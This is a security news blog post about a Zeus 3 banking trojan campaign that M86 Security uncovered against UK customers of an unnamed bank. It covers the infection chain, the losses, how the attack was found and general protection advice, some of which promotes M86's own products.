M86 discovers an active Zeus 3 attack – happening right now
M86 Security has discovered and exposed a sophisticated attack targeting the UK customers of an international financial institution. M86 believes that at least 3000 UK customers have been compromised, and that around £675,000 has been stolen (so far) from those customer accounts. A detailed analysis of the attack methodology can be found in M86’s whitepaper: Cybercriminals Target Online Banking Customers, and I thoroughly recommend that anyone who uses online banking should read this paper.
The trojan used in this attack is Zeus version 3 – the latest, most advanced and sophisticated iteration of the successful and dangerous Zeus family of banking malware. Customers of the financial institution concerned were infected by visiting compromised but legitimate websites, that had themselves been infected by the criminals. Code injected into these sites redirected visitors to the malicious Eleonore Exploit Kit 1.4.1. which ultimately led to the users being infected with Zeus 3. Relevant law enforcement agencies and the bank itself have been informed.
“Once the infection is achieved,” said Bradley Anstis, vice president of technology strategy, “the attack itself is targeted against a single financial institution, a global banking institution with offices in the UK.” At this point, given the ongoing nature of both the attack and the investigation M86 was unable to tell me which bank is involved (other than it involves the UK customers of this bank), nor where the criminals are located (other than that their command and control servers are located in Eastern Europe). When I first spoke to M86 a few days ago, approximately £525,000 had been syphoned off. As of this morning, this has risen to £675,000; and the attack is still progressing.
One of the worrying features of this attack is that the institution concerned offers its customers free anti-fraud security software. It isn’t yet clear whether the attackers managed to avoid detection by this software, or the customers simply didn’t install it. Nevertheless, M86 submitted samples of the malware to VirusTotal. “One of them,” said Anstis, “had a 2% detection rate by the anti-virus products, while the other had a 14% detection rate. The infected user accounts themselves are a mixture of personal accounts and commercial accounts – so it goes to show that just being a commercial customer with a security team protecting you from the evils of the internet doesn’t always guarantee that you’re going to be safe.” And if they’re not safe, what hope for the rest of us personal customers?
At this stage M86 doesn’t know the full extent of the attack. They located and examined one command and control server. There may be more. In fact there is as yet no way of knowing how long or how successful this attack has been. One reason is that the criminals have been patient – one would almost say, ‘not greedy’. They used, for example, a ‘Robin Hood’ algorithm to determine how much to steal from any particular account before transferring it to a money mule. “The system only stole money from accounts that held more than a specified amount of money, and usually in individual thefts averaging between £1000 and £3000.”
I asked M86 how it found this attack. “We have a free tool that anyone can download and use, called SecureBrowsing,” explained Anstis. “It tells you whether a link you get from search engine results, or Twitter etc, is malicious. This gives us a list of URLs that we know people are visiting, so we know the active places on the Internet where we should concentrate our attention – and from this and other feeds from our commercial products we noticed an infected legitimate site. We visited the site and got one of our test machines infected with the trojan concerned – in this case Zeus 3 – and we then started communicating with the command and control server handling that trojan. It was located in Eastern Europe. We compromised that command and control server and examined the log files – and that’s how we got all the information.”
So, what can we do to protect ourselves? Well one obvious route to take is to explore M86’s own security products – after all, they discovered this attack before anyone else. But that doesn’t mean that you can abandon traditional solutions. You still need anti-virus software, and you need to make sure it is as up to date as possible. You should then try to protect yourself during standard browsing. I always, and continue to, recommend using Firefox and the NoScript add-on. This will stop an infected website infecting you. And, of course, you should seriously examine M86’s own SecureBrowsing.